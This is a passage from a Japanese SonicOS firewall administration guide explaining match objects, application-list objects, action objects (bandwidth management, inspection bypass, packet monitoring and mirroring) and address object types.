クト」を選択します。「一致オブジェクトの設定」ダイアログが表示されます。

3 「オブジェクト名」フィールドにわかりやすいオブジェクト名を入力します。

4 ドロップダウンメニューから「一致オブジェクト種別」を選択します。ここでの選択内容はこ

の画面に表示されるオプションに影響します。一致オブジェクト種別の説明については、一致オブジェクトについて (150 ページ) を参照してください。

5 ドロップダウンメニューから「一致種別」を選択します。一致オブジェクトの種別によって選

択肢が変わります。



6 「入力形式」で、照合するテキストパターンとして「英数字」を選択します。バイナリコン

テンツを照合する場合は、「16 進数」を選択します。

7 「内容」テキストボックスに、照合するパターンを入力します。

8 「追加」を選択します。「リスト」フィールドに内容が表示されます。同じ手順を繰り返して、照合する他の要素を追加します。

「一致種別」が「Regex 一致」の場合、あらかじめ定義されている正規表現のいずれかを選択

し、「選択」をクリックして「リスト」に追加します。個別正規表現を「内容」フィールドに入力し、「追加」を選択して「リスト」に追加することもできます。

または、「ファイルからロード」を選択して、テキストファイルから要素のリストをインポート

することができます。ファイル内の各要素は、 1 行に 1 つずつ記述されている必要があります。

9 リストから要素を削除するには、「リスト」フィールドでその要素を選択し、「削除」を選択します。すべての要素を削除するには、「すべて削除」を選択します。


アプリケーションリストオブジェクトの設定このセクションでは、アプリケーションリストオブジェクトの作成方法を説明します。このオブ

ジェクトは、アプリケーションルールポリシーで一致オブジェクトと同じように使用できます。

アプリケーションリストオブジェクト種別の詳細 ( 「種別」画面に関する情報を含みます) について

は、アプリケーションリストオブジェクトについて (161 ページ) を参照してください。

アプリケーションリストオブジェクトを設定するには:

1 「オブジェクト > 一致オブジェクト」に移動します。



2 ページの上部で「追加」を選択し、「アプリケーションリストオブジェクト」を選択します。

「一致オブジェクトの作成」ダイアログが開き、「アプリケーション」画面が表示されます。

表示するアプリケーションは、 1 つ以上のアプリケーション種別、脅威度、技術を選択するこ

とによって制御できます。アプリケーションリストが縮小されて適切なリストに絞り込まれる

と、フィルタに対して個々のアプリケーションを選択できます。

3 ページの右上付近にある「検索」フィールドでは、必要に応じて、アプリケーション名の一部を入力し、検索アイコンを選択して、名前にそのキーワードが含まれるアプリケーションを検索できます。

4 「種別」ペインで、 1 つ以上のアプリケーション種別のチェックボックスをオンにします。

5 「脅威度」ペインで、 1 つ以上の脅威度のチェックボックスをオンにします。

6 「技術」ペインで、 1 つ以上の技術のチェックボックスをオンにします。

7 フィルタオブジェクトを追加するそれぞれのアプリケーションの隣にあるプラス記号を選択し

ます。アプリケーションの説明を表示するには、「名前」列内にある該当する名前を選択します。フィルタに対してアプリケーションを選択すると、プラス記号が緑色のチェックマークアイコンになり、選択したアプリケーションが右側の「アプリケーショングループ」ペインに表

示されます。このフィールド内のリストは、個々のアイテムを削除したり、イレイサーを選択してすべてのアイテムを削除したりして、編集することができます。



8 対象として含めるアプリケーションの選択が終了すると、初に「一致オブジェクト名を自動生成する」チェックボックスをオフにし、「一致オブジェクト名」フィールドにオブジェクトの名前を入力します。また、自動生成された名前を使用することもできます。

9 「適用」ボタンを選択します。「オブジェクト > 一致オブジェクト」ページに、オブジェクト

種別が「アプリケーションリスト」であるオブジェクト名のリストが表示されます。このオブ

ジェクトは、その後のアプリケーションルールポリシーの作成時に選択できます。



6

動作オブジェクトの設定

• オブジェクト > 動作オブジェクト (168 ページ)



• 動作オブジェクトの作成 (178 ページ)

• 動作オブジェクトの変更 (179 ページ)


オブジェクト > 動作オブジェクト

名前動作オブジェクトの名前。

動作種別動作オブジェクトが提供する動作の種別 (帯域幅管理、パケット監視など)。


動作オブジェクトの設定168

トピック :



• 動作オブジェクトの作成 (178 ページ)

• 動作オブジェクトの変更 (179 ページ)


動作オブジェクトについて動作オブジェクトは、一致イベントに対するアプリケーションルールポリシーの動作を定義しま

す。ユーザ定義の動作オブジェクトを作成するか、定義済みの規定の動作の 1 つを選択することがで

きます。

トピック :

• システム定義済みの規定の動作オブジェクトについて (169 ページ)

• ユーザ定義の動作オブジェクトのタイプについて (172 ページ)

システム定義済みの規定の動作オブジェクトについてSonicOS によってあらかじめ定義されたシステム定義の規定の動作がいくつかあります。これらの規定

の動作は編集または削除できません。規定の動作は、「ルール > アプリケーションルール」ページで

ポリシーを追加または編集する際に「アプリケーション制御ポリシーの編集」ページに表示されます。

既定の動作オブジェクト

内容帯域幅管理動作オブジェクトの場合、じょうごアイコンが表示されます。

ユーザが設定した動作オブジェクトの場合、「動作オブジェクトの追加/編集」ダ

イアログで指定した内容が表示されます。

設定 • 編集アイコンシステムが提供する動作オブジェクトの場合、編集アイコンは淡色表示となり、動作オブジェクトを変更できません。

• 削除アイコンシステムが提供する動作オブジェクトの場合、削除アイコンは淡色表示となり、動作オブジェクトを削除できません。



多くの帯域幅管理動作オブジェクトオプションも、あらかじめ定義された既定の動作リストで利用可

能です。この帯域幅管理動作オプションは、「ファイアウォール設定 > 帯域幅管理」ページの「帯域幅

管理種別」の設定によって異なります。「帯域幅管理種別」が「グローバル」に設定されている場合は、 8 つの優先順位すべてが選択可能です。「帯域幅管理種別」が「詳細」に設定されている場合は、

どの優先順位も選択できませんが、ポリシーの追加時には定義済みの優先順位を使用できます。

バイパス動作オブジェクトオプションも、既定の動作リストで利用可能です。示されたセキュリ

ティサービスがファイアウォール上でライセンスされている場合に利用できます。

ポリシーの追加: 事前定義された既定の動作の可用性表には、ポリシーを追加するときに定義済みの

既定の動作を使用できる条件が示されています。

定義済みの動作タイプについては、定義済みの規定の動作オブジェクトについてを参照してください。帯域幅管理動作の詳細については、帯域幅管理を用いた動作について (173 ページ) を参照してく

ださい。

ポリシーの追加: 事前定義された既定の動作の可用性

常時利用可帯域幅管理種別

グローバル詳細

WAN 帯域幅管理-高

動作なし

DPI を迂回する

パケット監視

GAV を迂回する

IPS を迂回する

SPY を迂回する

キャプチャ ATP をバ

イパス

帯域幅管理グローバル-リア

ルタイム

帯域幅管理グローバル- 高

帯域幅管理グローバル-高

帯域幅管理グローバル-中高

帯域幅管理グローバル-中

帯域幅管理グローバル-中低

帯域幅管理グローバル-低

帯域幅管理グローバル- 低

高度な帯域幅管理 - 低

高度な帯域幅管理 - 中

高度な帯域幅管理 - 高

定義済みの規定の動作オブジェクトについて

動作種別説明

WAN 帯域幅管理-高受信と送信帯域幅を管理し、変動可能な値で保証された帯域幅、および利用可能帯域幅全体の大 100%までの大/バースト帯域幅使用率

の設定が可能です。事前定義

動作なし動作を指定しないでポリシーを指定することができます。これで“ログ

のみ"のポリシー種別を使用できます。

DPI を迂回する精密パケット検査コンポーネントの IPS、 GAV、アンチスパイウェア、お

よびアプリケーション制御をバイパスします。この動作は、トリガーされた直後から接続期間全体にわたって維持されます。アプリケーション制御検査用にバイパスされることのない FTP 制御チャンネルに対しては

特殊な操作が適用されます。この動作は、 FTP データチャンネルの適切

な処理をサポートします。 DPI のバイパスでは、「ファイアウォール設

定 > SSL 制御」ページで有効化されたフィルタの停止が行われません。

パケット監視 SonicOS のパケット監視機能を使用して、セッション内の着信パケット

と発信パケットを監視するか、ミラーリングが設定されている場合はパケットを別のインターフェースにコピーします。キャプチャ結果は

WireShark で表示や分析ができます。



帯域幅管理グローバル-リア

ルタイム

受信と送信帯域幅を管理し、変動可能な値で保証された帯域幅、および利用可能帯域幅全体の大 100%までの大/バースト帯域幅使用率

の設定が可能で、優先順位 0 に設定されています。

帯域幅管理グローバル- 高受信と送信帯域幅を管理し、変動可能な値で保証された帯域幅、およ

び利用可能帯域幅全体の大 100%までの大/バースト帯域幅使用率


帯域幅管理グローバル-高受信と送信帯域幅を管理し、変動可能な値 (既定は 30%) で保証された

帯域幅、および利用可能帯域幅全体の大 100% までの大/バースト

帯域幅使用率の設定が可能で、優先順位 2 に設定されています。

帯域幅管理グローバル-中高受信と送信帯域幅を管理し、変動可能な値で保証された帯域幅、および利用可能帯域幅全体の大 100% までの大/バースト帯域幅使用率


帯域幅管理グローバル-中受信と送信帯域幅を管理し、変動可能な値 (既定は 50%) で保証された



帯域幅管理グローバル-中低受信と送信帯域幅を管理し、変動可能な値で保証された帯域幅、および利用可能帯域幅全体の大 100% までの大/バースト帯域幅使用率


帯域幅管理グローバル-低受信と送信帯域幅を管理し、変動可能な値 (既定は 20%) で保証された



帯域幅管理グローバル- 低受信と送信帯域幅を管理し、変動可能な値で保証された帯域幅、および利用可能帯域幅全体の大 100% までの大/バースト帯域幅使用率


GAV を迂回するポリシーに一致するトラフィックのゲートウェイアンチウィルス検査を

バイパスします。この動作は、トリガーされた直後から接続期間全体にわたって維持されます。アプリケーション制御検査用にバイパスされることのない FTP 制御チャンネルに対しては特殊な操作が適用されます。

この動作は、 FTP データチャンネルの適切な処理をサポートします。

IPS を迂回するポリシーに一致するトラフィックの侵入防御サービス検査をバイパス

します。この動作は、トリガーされた直後から接続期間全体にわたって維持されます。アプリケーション制御検査用にバイパスされることのない FTP 制御チャンネルに対しては特殊な操作が適用されます。こ

の動作は、 FTP データチャンネルの適切な処理をサポートします。


動作種別説明



ユーザ定義の動作オブジェクトのタイプについてユーザ定義の動作オブジェクトを作成するために使用できる動作タイプは、「動作オブジェクトの追加/編集ダイアログ」に表示されます。このダイアログは「オブジェクト > 動作オブジェクト」ペー

ジの「追加」を選択すると表示されます。

動作種別の説明については、ユーザ定義の動作オブジェクトの動作タイプを参照してください。

SPY を迂回するポリシーに一致するトラフィックのアンチスパイウェア検査をバイパスします。この動作は、トリガーされた直後から接続期間全体にわたって維持されます。アプリケーション制御検査用にバイパスされることのない FTP 制御チャンネルに対しては特殊な操作が適用されます。この動作

は、 FTP データチャンネルの適切な処理をサポートします。

キャプチャ ATP をバイパスマルウェアではないことが確実なファイルについて Capture AdvancedThreat Protection (ATP) の分析をスキップする場合に使用できます。こ

の動作は、トリガーされた直後から接続期間全体にわたって維持されます。

このオプションを選択しても、 GAV やクラウドアンチウィルスのよう

な他のアンチ脅威コンポーネントによるファイルの判定はスキップされません。

メモ：「動作オブジェクトの追加/編集」ダイアログで動作オブジェクト設定で利用可能なアク

ションタイプを使用してユーザ定義の動作オブジェクトを作成できます。既定の定義済み動作オブジェクトは、編集または削除できません。ポリシーを作成する場合、「アプリケーション制御ポリシーの編集」ダイアログでは、あらかじめ定義されている動作や定義したカスタマイズ済み動作を選択できます。

ユーザ定義の動作オブジェクトの動作タイプ

動作種別説明

SMTP 電子メールを遮断 -エラー応答の送信

SMTP 電子メールを遮断し、カスタマイズされたエラーメッセージを送

信者に通知します。

電子メール添付ファイルを無効化 - テキストの追加

電子メールの添付ファイルを無効にし、カスタマイズされたテキストを追加します。


動作種別説明



優先順位 0 の設定は、高優先順位です。すべての帯域幅管理レベルに対する保証帯域幅の合計は、

100% を超えることはできません。

帯域幅管理を用いた動作についてアプリケーション層帯域幅管理 (BWM) を利用すると、プロトコル内の特定のファイルタイプに対し

ては帯域幅の消費を制限する一方で、それ以外のファイルタイプに対しては帯域幅を無制限に使用

するポリシーを作成できます。これにより、同じプロトコル内で好ましいトラフィックと好ましくないトラフィックを区別できます。アプリケーション層帯域幅管理は、すべてのアプリケーション一致や、 HTTP クライアント、 HTTP サーバ、個別、および FTP ファイル転送の種別を使用する個別アプリ

ケーションルールポリシーでサポートされます。ポリシー種別の詳細については、アプリケーショ

ンルールポリシーの作成について (36 ページ) を参照してください。

「ファイアウォール設定 > 帯域幅管理」ページの「帯域幅管理種別」が「グローバル」に設定されて

いる場合、アプリケーション層帯域幅管理機能は、「ルール > アプリケーションルール」ページから

のポリシーの追加時に使用できる、定義済みの 8 つの既定の帯域幅管理優先順位レベルによってサ

ポートされます。

電子メール - テキストの追加電子メールの末尾に個別テキストを追加します。

FTP 通知の応答接続を終了せずに FTP 制御チャンネルを介してクライアントにテキス

トを返します。

HTTP 遮断ページ個別 HTTP 遮断ページを設定できます。色も選択できます。

HTTP リダイレクト HTTP リダイレクト機能を提供します。例えば、 Google ウェブサイトに

ユーザをリダイレクトする場合は、カスタマイズ可能な部分を次のように設定します (http://www.google.com)。フォームが開いている

ブラウザにアプリケーション制御から HTTP リダイレクトが送信される

と、フォーム内の情報は失われます。

帯域幅管理アクセスルール BWM ポリシー定義と同じセマンティクスを持つ帯域

幅管理制限を定義できます。

ユーザ定義の動作オブジェクトの動作タイプ

動作種別説明



すべてのアプリケーション帯域幅管理は、「ファイアウォール設定 > 帯域幅管理」ページで設定され

るグローバル帯域幅管理と関連しています。

次の 2 種類の帯域幅管理が利用できます。詳細およびグローバルです。

• 種別が「詳細」に設定されている場合、帯域幅管理は「アプリケーションルール」に対して個

別に設定できます。

• 種別が「グローバル」に設定されている場合、設定済みの帯域幅管理をすべてのゾーン内のすべてのインターフェースに対してグローバルに適用できます。

ベストプラクティスとして、「ファイアウォール設定 > 帯域幅管理」ページのグローバル帯域幅管理

の設定は、常にいかなる帯域幅管理ポリシーの設定よりも前に行う必要があります。

「ファイアウォール設定 > 帯域幅管理」ページの「帯域幅管理種別」を「詳細」から「グローバル」に

変更すると、すべてのアクセスルールで帯域幅管理が無効になります。ただし、アプリケーション制

御ポリシー内の既定の帯域幅管理動作オブジェクトは、グローバル帯域幅管理設定に変換されます。

「帯域幅管理種別」を「グローバル」から「詳細」に変更すると、すべてのアプリケーションルー

ルポリシーで使用されている既定の帯域幅管理動作は、変更前にどのようなレベルに設定されてい

ても、「高度な帯域幅管理 - 中」に自動変換されます。

トピック :

• 既定の帯域幅管理動作 (175 ページ)

• 個別帯域幅管理動作 (175 ページ)

• 帯域幅管理方式 (177 ページ)

• 帯域幅管理動作オブジェクト情報の表示 (177 ページ)



既定の帯域幅管理動作「詳細」と「グローバル」の切り替えを行うと、既定の帯域幅管理動作が「帯域幅管理グローバル -

中」に変換されます。動作種別を切り替えても、ファイアウォールによって以前の優先順位レベルが保存されることはありません。変換の内容は、「ルール > アプリケーションルール」ページで確認で

きます。

個別帯域幅管理動作個別帯域幅管理動作は既定の帯域幅管理動作と異なる振舞いをします。個別帯域幅管理動作は、「オブジェクト > 動作オブジェクト」ページで動作オブジェクトを作成することで設定されます。個別帯

域幅管理動作と、そうした動作を使用するポリシーでは、「帯域幅管理種別」が「グローバル」と「詳細」の間で切り替えられるたびに、それぞれの優先順位設定が保持されます。

帯域幅管理種別がグローバルであるポリシーでの個別帯域幅管理動作の図に、グローバル帯域幅管理種別が「グローバル」に設定された後の同じポリシーを示します。ツールチップには優先順位のみが表示されています。これは、レベル 5 の保証帯域幅または大帯域幅のグローバル優先順位キューに

値がまったく設定されていないからです。

帯域幅管理種別がグローバルであるポリシーでの個別帯域幅管理動作

「帯域幅管理種別」が「グローバル」に設定されている場合、「動作オブジェクトの追加/編集」ダ

イアログには、「帯域幅優先順位」のオプションが提示されますが、使用される値は、「ファイアウォール設定 > 帯域幅管理」ページにある「優先順位」テーブルで「保証帯域幅」および「大帯域

幅」について指定されているものです。

帯域幅管理タイプグローバルでのアクションオブジェクトの追加/編集ページは、「ファイアウォー

ル設定 > 帯域幅管理」ページでグローバル帯域幅管理種別が「グローバル」に設定されている状態で

の「動作オブジェクトの追加/編集」ダイアログ内の帯域幅優先順位の選択肢を示します。



帯域幅管理タイプグローバルでのアクションオブジェクトの追加/編集ページ

アプリケーション層の帯域幅管理の設定は、アクセスルールの帯域幅管理の設定と同じ方法で処理さ

れます。どちらもグローバル帯域幅管理設定に関連付けられています。しかしながら、アクセスルー

ルではできないすべての内容種別を指定することが、アアプリケーションルールでは可能です。

帯域幅管理の使用事例として、管理者が就業時間内の .mp3 および実行可能ファイルのダウンロード

を 1Mbps を超えないように制限する場合があります。同時に、 .doc や .pdf など、業務との関連性

の高いファイル種別のダウンロードについては、利用可能な大帯域幅まで許可し、場合によっては業務との関連性の高いコンテンツのダウンロードに可能な限り高の優先順位を与えたい場合もあります。もう 1 つの例として、特定の種別のピアツーピア (P2P) トラフィックには帯域幅制限をかける

一方で、その他の種別の P2P には制限なしの帯域幅を許可したい、というケースがあります。アプリ

ケーション層の帯域幅管理により、これらを実施するポリシーを作成することが可能になります。

多くの帯域幅管理動作オプションも、あらかじめ定義された既定の動作リストで利用可能です。この帯域幅管理動作オプションは、「ファイアウォール設定 > 帯域幅管理」ページの「帯域幅管理種別」

の設定によって異なります。「帯域幅管理種別」が「グローバル」に設定されている場合は、 8 つの

優先順位すべてが選択可能です。「帯域幅管理種別」が「詳細」に設定されている場合は、どの優先順位も選択できませんが、ポリシーの追加時には定義済みの優先順位を使用できます。

ポリシーの追加: 事前定義された既定の動作の可用性テーブルに、ポリシー追加時に利用可能な事前

定義済みの既定の動作を示します。

メモ：設定されているかどうかに関係なく、すべての優先順位 (リアルタイム～低) が表示さ

れます。どの優先順位が有効かを確認するには、「ファイアウォール設定 > 帯域幅管理」ペー

ジを参照します。「帯域幅管理種別」が「グローバル」に設定されていて、有効になっていない帯域幅優先順位を選択した場合、トラフィックは自動的にレベル 4 の優先順位 (4 (中)) にマッ

プされます。

メモ：すべての帯域幅管理レベルに対する保証帯域幅の合計は、 100% を超えることはできま

せん。



帯域幅管理方式帯域幅管理機能は、次の 2 つの方法で実装できます。

帯域幅管理: 実装方法

• ポリシーごとの方法 - ポリシーで指定した帯域幅制限がポリシーごとに個別に適用される

例: 2 つのポリシーがそれぞれ独立して 500 (KB/秒) の制限を受けるとき、この 2 つのルールに

よる可能な合計の帯域幅は 1000 (KB/秒) となる

• 動作ごとの総計による方法 - 帯域幅制限の動作が適用対象のすべてのポリシーに (共用的に) 適用

される

例: 2 つのポリシーが 500 (KB/秒) の帯域幅管理の制限を共用するとき、合計の帯域幅は 500 (KB/秒) に制限される

帯域幅管理動作オブジェクト情報の表示帯域幅管理動作オブジェクトに関する情報を表示するには、「コンテンツ」列の動作オブジェクトの「じょうご」アイコン上にマウスを移動します。「帯域幅管理」ポップアップツールチップが表示

されます。



動作オブジェクトの作成SonicOS には、規定のあらかじめ定義されている動作オブジェクトがあります。これらについては、

システム定義済みの規定の動作オブジェクトについて (169 ページ) に記載されています。これらの動

作オブジェクトは、変更や削除ができません。

あらかじめ定義された動作を使用しない場合は、新しい動作オブジェクトを設定します。以下に示す「動作オブジェクトの設定」ダイアログでは、設定可能な動作をテキストまたは URL を使用してカス

タマイズできます。「動作」ドロップダウンリストで使用可能な動作タイプを選択できます。あら

かじめ定義された動作に加え、これまでに作成した設定可能な動作も、アプリケーションルールポリシーの作成時に選択肢として表示されます。

動作オブジェクトを設定するには:

1 管理ビューで、「ポリシー | オブジェクト > 動作オブジェクト」に移動します。

2 ページの上部にある「追加」を選択します。

3 「A 動作オブジェクトの追加/編集」ダイアログの「動作名」フィールドで、わかりやすい動作

名を入力します。

4 「動作」ドロップダウンメニューで、目的の動作タイプを選択します。

5 「内容」フィールドに、動作で使用するテキストまたは URL を入力します。

6 「HTTP 遮断ページ」を動作タイプとして選択すると、オプション項目が変わります。

a 「内容」フィールドに、ページが遮断された場合に表示する内容を入力します。

b 「色」ドロップダウンメニューから遮断ページの背景色を選択します。

• 白

• 黄色

• 赤

• 青色

c 遮断ページメッセージのプレビューを表示するには、「プレビュー」ボタンを選択し

ます。

7 「帯域幅管理」を動作タイプとして選択すると、オプション項目が変わります。これらのオプションを設定するには、『SonicOS セキュリティ設定』技術ドキュメントの「ファイアウォー



ル設定 > 帯域幅管理」セクションの「動作オブジェクト」の帯域幅オブジェクトの有効化を参

照してください。


動作オブジェクトの変更ユーザが設定した個別動作オブジェクトは変更することができます。システム定義済みの既定の動作オブジェクトは変更できません。

動作オブジェクトを変更するには:

1 管理ビューで、「ポリシー | オブジェクト > 動作オブジェクト」に移動します。

2 変更するオブジェクトの編集アイコンを選択します。「動作オブジェクトの設定」ダイアログが表示されます。

3 動作オブジェクトの作成 (178 ページ) の手順 3 から手順 8 を実行します。

パケット監視を使用したアクションの関連タスク事前定義済みのパケット監視動作がポリシーに対して選択されている場合、 SonicOS は「ツール > パケット監視」ページの「調査」上で構成した設定に応じてトラフィックをキャプチャまたはミラーします。既定では、 Wireshark™ で参照可能なキャプチャファイルを作成します。 Wireshark について

は、 Wireshark (46 ページ) を参照してください。

パケット監視動作を用いてポリシーを設定して後、実際にパケットをキャプチャするために、「パケット監視」ページで「キャプチャの開始」を選択する必要があります。欲しいパケットをキャプチャした後で、「ミラーの停止」を選択します。

トピック :

• ポリシーに関連するパケットのキャプチャ (179 ページ)

• ミラーリングの設定 (180 ページ)

ポリシーに関連するパケットのキャプチャ

ポリシーに関連するパケットのみをキャプチャするようにパケット監視動作を制御するには、以下の手順に従います。

1 「調査」ビューで、「ツール | パケットモニタ」ページを開きます。

2 「設定」ボタンをクリックします。「パケット監視の設定」ダイアログが表示されます。



3 「監視フィルタ」を選択します。

4 「ファイアウォール/アプリケーションルールによるフィルタを有効にする」を選択します。こ

のオプションは、既定では選択されていません。

このモードでは、「パケット監視」ページで「キャプチャの開始」を選択した後で、トラフィックがアプリケーション制御ポリシー (またはアクセスルール) を始動させるまではパケッ

トはキャプチャされません。ポリシーが始動される際には、「ログ > イベントログ」ページの

「調査」ビューで警告メッセージを確認できます。

これは、パケットモニタの動作タイプを持つアクションオブジェクト、またはパケットモニ

タを使用する「ルール > アクセスルール」で作成されたポリシーを使用して作成されたアプリ

ケーションルールポリシーで機能し、キャプチャまたはミラーリング対象の設定またはフィ

ルタリングを指定できます。例えば、キャプチャを異なる形式でダウンロードして、ブラウザ内で参照できます。


ミラーリングの設定

ミラーリングを設定するには、以下の手順に従います。

1 「調査」ビューで、「ツール | パケットモニタ」ページを開きます。

2 「設定」ボタンをクリックします。「パケット監視の設定」ダイアログが表示されます。



3 「ミラー」を選択します。

4 「ローカルミラー設定」の下の「フィルタされたパケットをインターフェースにミラーする」

ドロップダウンメニューからでミラーされたパケットを送信する先のインターフェースを選択

します。

5 また、リモート設定のうち 1 つを設定できます。これにより、アプリケーションパケットを別の

コンピュータにミラーしてすべてをハードディスク上に保存することが可能です。例えば、 MSNインスタントメッセンジャートラフィックをキャプチャして会話を読むことができます。




7

アドレスオブジェクトの設定

• オブジェクト > アドレスオブジェクト (182 ページ)

• アドレスオブジェクトの種別 (183 ページ)

• アドレスグループについて (184 ページ)

• 「オブジェクトについて > アドレスオブジェクト」ページ (184 ページ)

• 既定のアドレスオブジェクトおよびアドレスグループ (188 ページ)

• 既定の Pref64 アドレスオブジェクト (189 ページ)

• アドレスオブジェクトの追加 (189 ページ)

• アドレスオブジェクトの編集 (191 ページ)

• ユーザ定義アドレスオブジェクトの削除 (191 ページ)

• MAC または FQDN アドレスオブジェクトの消去 (192 ページ)

• アドレスグループの作成 (192 ページ)

• 動的アドレスオブジェクトの使用 (194 ページ)

オブジェクト > アドレスオブジェクトアドレスオブジェクトを使用することで、 1 度定義したエンティティを SonicOS インターフェース全

体の複数の参照インスタンスで再利用することができます。アドレスオブジェクトの作成は単に IPアドレスを入力するよりも手間がかかりますが、アドレスオブジェクトは SonicOS の管理機構を補完

する目的で実装されており、それによって以下の特徴が実現されています。

• ゾーンの関連付け - ホスト、 MAC、および FQDN のアドレスオブジェクトを定義する際は、明

示的にゾーンを指定する必要があります。インターフェースのほとんどの領域 (アクセスルー

ルなど) では、指定されたゾーンは参照のためにしか使われません。指定されたゾーンが機能

上の目的で使用されるのは、「アドレスオブジェクト」ドロップダウンリストの項目をコン

テキストに合わせて正確に表示するために利用される場合と、ユーザおよびグループに割り当てる VPN アクセスを定義する場合です。アドレスオブジェクトを使用して VPN アクセスを定

義する際には、アクセスルール自動作成プロセスによってアドレスオブジェクトのゾーンが

参照され、そのルールを割り当てるべき VPN [ゾーン] の共通部分が適切に決定されます。例え

ば、 LAN ゾーンに属する 192.168.168.200 Host というホストアドレスオブジェクトが TrustedUsers ユーザグループの VPN アクセスに追加された場合、自動的に作成されるアクセスルール

は VPN LAN ゾーンに割り当てられます。

• 管理と処理 - 多用途の種別に属するアドレスオブジェクト群は SonicOS インターフェース全域

で簡単に使用できるため、 (アクセスルールを定義する場合など) 処理の定義や管理を素早く行

うことができます。また、アドレスグループのメンバーは単純な操作によって簡単に追加また


アドレスオブジェクトの設定182

は削除できるので、それを参照するルールやポリシーを直接操作する必要なしに、ルールやポリシーの内容を効率的に変更することができます。

• 再利用性 - オブジェクトを定義する必要があるのは一度だけで、定義したオブジェクトは必要

に応じて何度でも容易に参照できます。

例えば、 IP アドレスが 67.115.118.80 の内部ウェブサーバがあるとします。アクセスロールや NATポリシーを作成する際に IP アドレスを繰り返し入力するのではなく、アドレスオブジェクトを使用

して、例えばマイウェブサーバという 1 つのエンティティを IP アドレス 67.115.118.80 のホスト

アドレスオブジェクトとして作成します。このマイウェブサーバアドレスオブジェクトは、アドレ

スオブジェクトを定義条件として使用する任意の設定画面で、ドロップダウンメニューから簡単に

選択できます。

トピック :

• アドレスオブジェクトの種別 (183 ページ)

• アドレスグループについて (184 ページ)

• 「オブジェクトについて > アドレスオブジェクト」ページ (184 ページ)

• 既定のアドレスオブジェクトおよびアドレスグループ (188 ページ)

• 既定の Pref64 アドレスオブジェクト (189 ページ)

• アドレスオブジェクトの追加 (189 ページ)

• アドレスオブジェクトの編集 (191 ページ)

• ユーザ定義アドレスオブジェクトの削除 (191 ページ)

• MAC または FQDN アドレスオブジェクトの消去 (192 ページ)

• アドレスグループの作成 (192 ページ)

• 動的アドレスオブジェクトの使用 (194 ページ)

アドレスオブジェクトの種別ネットワークアドレスの表現にはさまざまな種類があるため、アドレスオブジェクト種別テーブル

に示す複数のアドレスオブジェクト種別が用意されています。

アドレスオブジェクト種別

種別定義

ホスト IP アドレスとゾーン関連によって 1 つのホストを定義します。ホストアドレスオブ

ジェクトのサブネットマスクは、単独のホストを識別できるように自動的に 32 ビット

(255.255.255.255) に設定されます。例えば、 My Web Server の IP アドレスは 67.115.118.110 であり、既定のネットマスクは 255.255.255.255 です。

範囲連続する IP アドレスの範囲を定義します。範囲アドレスオブジェクトにはサブネット

マスクは関連付けられませんが、内部ロジックでは通常、指定範囲の各アドレスは 32ビットでマスクされたホストオブジェクトとして扱われます。例えば、 My PublicServers の開始 IP アドレスは 67.115.118.66、終了 IP アドレスは 67.115.118.90 です。この範囲内の 25 個の個々のホストアドレスはすべてこのアドレスオブジェクトに

含まれます。



アドレスグループについてSonicOS には、アドレスオブジェクトと他のアドレスグループをアドレスグループにグループ化する

機能があります。アドレスグループを定義することで、参照の効率を向上させることができます。

アドレスグループは、ホストアドレスオブジェクト、範囲アドレスオブジェクト、ネットワークアドレスオブジェクトを任意に組み合わせて構成できます。例えば、マイ公開グループにはホストアドレスオブジェクトであるマイウェブサーバと、範囲アドレスオブジェクトであるマイ公開サーバ

を含められるので、実質的に IP アドレス 67.115.118.66～67.115.118.90、および IP アドレス

67.115.118.110 を表すことができます。

動的アドレスオブジェクト (MAC および FQDN) は別にグループ化する必要がありますが、 IP ベースの

アドレスオブジェクトのグループに MAC アドレスオブジェクトを追加すること自体は安全です。 IPアドレスオブジェクトのグループに追加された MAC アドレスオブジェクトは、処理のコンテキスト

においてその参照が無意味なとき (NAT ポリシーの場合など) には無視されます。

「オブジェクトについて > アドレスオブジェク

ト」ページ「オブジェクト > アドレスオブジェクト」ページには 2 つの画面があります。

• アドレスオブジェクト画面 (185 ページ)

ネットワーク

複数のホストを構成するという点で範囲オブジェクトと似ていますが、アドレスの上限と下限を指定するのではなく、有効なサブネットマスクによってアドレスの境界を定義

します。ネットワークアドレスオブジェクトは、ネットワークのアドレスとそれに対応

するサブネットマスクによって定義する必要があります。例えば、ネットワーク値が

67.115.118.64、サブネットマスクが 255.255.255.224 のマイ公開ネットワークの

アドレスは、 67.115.118.64～67.115.118.95 になります。一般的なルールとして、

ネットワークの初のアドレス (ネットワークアドレス) およびネットワークの後のア

ドレス (ブロードキャストアドレス) はホストに割り当てることはできません。

MAC ハードウェアアドレスまたは IPv4/IPv6 MAC (メディアアクセスコントロール) アドレス

によってホストを識別できます。 MAC アドレスは、ハードウェアの製造元によって有

線または無線のすべてのネットワーク機器に個別に割り当てられており、変更できないようになっています。 MAC アドレスは、 6 バイト 16 進数形式で表記される 48 ビット値

です。例えば、 My Access Point の MAC アドレスは 00:06:01:AB:02:CD です。 MAC アドレスは、セキュリティ装置の ARP キャッシュを参照することにより、 IP アドレスに解

決されます。 MAC アドレスオブジェクトは、 SonicPoint や SonicWave ID などの SonicOS の無線構成のさまざまなコンポーネントによって使用され、無線スキャン中に検出された無線アクセスポイントの BSSID (Basic Service Set Identifier または WLAN MAC) を認証しま

す。 MAC アドレスオブジェクトを使用して、ホストがゲストサービス認証をバイパス

できるようにすることもできます。

FQDN 例えば www.sonicwall.com など、ホストの IPv4/IPv6 による完全修飾ドメイン名 (FQDN) を使ってホストを識別できます。 FQDN は、セキュリティ装置の設定で指定されている

DNS サーバを使用して IP アドレスに解決されます。ワイルドカードエントリは、 DNSサーバに送信されたクエリに対する応答によってサポートされます。

アドレスオブジェクト種別

種別定義



• アドレスグループ画面 (185 ページ)

この 2 つの画面は似ており、同じような機能を備えていますが、いくつかの違いがあります。

このページで使用できる機能については、以下を参照してください。

• 共通の機能 (186 ページ)

• エントリの並べ替え (188 ページ)

アドレスオブジェクト画面

アドレスグループ画面



共通の機能それぞれの画面には次のような共通の機能があり、テーブルには同じ列見出しがあります。

それぞれのテーブルの下部には、テーブル内のエントリ数が表示されます。

トピック :

• 共通の機能 (186 ページ)

• 共通の列見出し (187 ページ)

共通の機能

• 追加 - アドレスオブジェクトまたはアドレスグループを追加する場合に選択します。

• 削除 - 「選択の削除」を選択して選択したユーザ定義エントリを削除するか、「すべて削除」

選択してすべてのユーザ定義エントリをテーブルから削除します。既定のエントリは削除できません。

• 検索 - 検索文字列を入力すると、その文字列を含むエントリのみが表示されます。検索文字列

の大文字と小文字は区別されます。フィールド内の X を選択して検索フィルタを削除し、前の

画面に戻ります。

